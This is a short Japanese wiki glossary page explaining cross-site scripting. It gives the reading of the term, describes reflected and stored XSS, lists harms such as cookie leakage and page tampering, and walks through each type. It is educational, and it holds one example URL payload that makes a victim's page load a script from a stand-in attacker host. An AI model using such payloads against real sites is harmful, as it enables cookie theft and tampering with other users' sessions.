XSS

提供: セキュリティ
2013年1月7日 (月) 23:05時点におけるDaemon (トーク | 投稿記録)による版 (ページの作成:「XSS は、 Cross Site Scripting の略です。 読み方 :XSS ::えっくすえすえす :Cross Site Scripting ::クロスサイトスクリプティング __TOC__ ...」)

(差分) ←前の版 | 最新版 (差分) | 次の版→ (差分)
移動: 案内検索
スポンサーリンク

XSS は、 Cross Site Scripting の略です。

読み方

XSS
えっくすえすえす
Cross Site Scripting
クロスサイトスクリプティング


概要

以下のタイプが存在します。

  • 折り返し型 XSS ( Reflected XSS )
    • フィッシングメール、攻撃用 Web サーバの利用
  • 蓄積型 XSS (Stored XSS)
    • SNS, 掲示板、ブログ

被害

JavaScript で実現可能なこと範囲で、被害を受ける。

  • Cookie の漏洩
  • 情報漏えい
  • Web ページの改ざん
  • マルウェアの感染
  • 別のサイトへの誘導

Reflected XSS

  1. http://example.com/?id=<script src="http://eval.com/bad.js"></script>
    へユーザを送り込む。
  2. ユーザが example.com にアクセスすると、 example.com は、 id の値をそのままエコーバックする。
  3. example.com のページは、 eval.com/bad.js をロードし、 example.com の権限で実行される。

Stored XSS

  1. 掲示板に「悪意のあるスクリプト」を書き込む。
    <script>
    悪意のあるスクリプト
    </script>
  2. その掲示板に第三者がアクセスする。
  3. 「悪意のあるスクリプト」を含む HTML ページがロードされる。
  4. 第三者のブラウザで、「悪意のあるスクリプト」が実行される。

関連情報



スポンサーリンク

https://kaworu.jpn.org/security/index.php?title=XSS&oldid=6」から取得